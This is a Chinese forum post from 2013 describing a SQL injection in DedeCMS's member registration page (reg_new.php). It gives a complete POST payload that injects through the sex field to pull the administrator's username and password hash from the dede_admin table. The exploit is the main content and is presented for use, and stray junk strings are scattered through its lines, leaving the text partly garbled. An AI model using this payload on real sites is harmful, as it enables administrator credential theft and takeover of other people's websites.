找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1969|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞/ w: j# M& z. i: {3 [, ~9 E
简要描述:
5 [" B( }9 a( M7 I# v, A # P5 O% w2 ^& W6 i" r7 P
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
. |/ Z; y! Q( o原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
* B5 I  a* w4 A+ `( P4 c详细说明:跟这个漏洞
4 Z" s7 f* v! V3 T % p; t4 C) B* i; g6 C- k
WooYun: Dedecms SQL注射导致审核机制绕过漏洞# z! Z. h6 ~3 f" P  I
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.9 u3 I- g$ n# ^5 c4 `! l
POST提交以下数据,其实不用POST提交的,这样隐蔽点.* v7 `- g, {$ k+ X2 k

) \; {0 I$ t* P5 O& g5 Swww.political-security.com/member/reg_new.php- F; a- z- c( O' u8 @) D6 o% \5 Z2 t

4 S3 Z' K- m& l. }3 [# i$ v& ePOST
" T- P4 _4 p& I9 D * ?( |+ U' K0 `2 U! ?) M
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&7 @1 G5 `* y/ [- ?
userid=c4rp3nt3r&uname=c4rp3nt3r
2 E* D" Z* M; P, ?; [# i&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
/ h" a/ b( h$ E: x; K- r&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
+ V( e2 r2 |6 j(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
% v% q  s: _; R2 {+ [& |  W%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表